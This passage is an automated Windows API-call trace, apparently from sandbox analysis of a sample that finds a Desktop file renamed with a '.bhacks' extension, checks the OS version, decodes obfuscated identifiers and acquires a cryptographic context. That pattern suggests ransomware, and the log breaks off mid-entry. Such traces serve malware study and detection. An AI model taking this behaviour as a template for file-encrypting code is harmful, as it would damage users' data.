[0102.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0102.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0102.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0102.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0102.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0102.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0102.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0102.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0102.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0102.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0102.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0102.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0102.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0102.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0102.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0102.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0102.579] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0102.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72028 [0102.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0102.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0102.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0102.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0102.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0102.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0102.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0102.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0102.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0102.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0102.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0102.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0102.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0102.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0102.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0102.580] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0102.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72028 [0102.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0102.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0102.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0102.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0102.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0102.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0102.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0102.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0102.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0102.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0102.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0102.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0102.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0102.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0102.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0102.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0102.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0102.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0102.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0102.580] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/mCQMPnOOyUYP.gif.bhacks", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23ef8520, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x23ef8520, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2402951c, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x2da0, dwReserved0=0x0, dwReserved1=0x0, cFileName="mCQMPnOOyUYP.gif.bhacks", cAlternateFileName="MCQMPN~1.BHA")) returned 0x9a3b80 [0102.581] FindClose (in: hFindFile=0x9a3b80 | out: hFindFile=0x9a3b80) returned 1 [0102.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0102.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0102.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0102.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0102.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0102.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0102.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0102.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0102.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0102.582] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0102.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72028 [0102.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0102.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0102.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0102.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0102.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0102.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0102.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0102.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0102.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0102.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0102.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0102.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0102.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0102.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0102.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0102.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0102.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0102.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0102.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0102.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0102.583] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.583] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0102.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0102.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0102.583] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0102.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0102.583] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0102.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0102.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0102.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0102.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0102.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0102.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0102.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0102.583] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0102.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0102.583] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0102.583] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0102.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0102.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0102.583] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0102.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0102.583] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0102.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0102.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0102.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0102.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0102.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0102.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0102.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0102.584] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0102.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0102.584] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0102.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0102.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0102.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0102.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0102.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0102.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0102.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0102.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0102.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0102.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0102.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0102.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0102.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0102.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0102.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0102.584] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0102.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0102.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0102.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0102.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0102.584] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0102.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0102.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0102.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0102.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0102.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0102.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0102.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0102.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0102.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0102.585] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0102.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0102.585] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0102.585] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0102.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0102.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0102.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0102.585] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0102.585] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0102.585] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0102.585] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0102.585] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0102.585] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0102.585] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0102.585] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0102.586] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0102.586] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0102.586] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0102.586] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0102.586] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0102.586] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0102.586] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0102.586] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0102.586] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0102.586] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0102.586] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f70c0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0102.586] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0102.586] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f70c0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0102.586] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9beab0) returned 1 [0102.587] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0102.587] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0102.587] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0102.587] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0102.587] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0102.587] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0102.587] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0102.587] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0102.587] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0102.587] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0102.587] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0102.587] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0102.588] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0102.588] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0102.588] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0102.588] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0102.588] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0102.588] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0102.588] 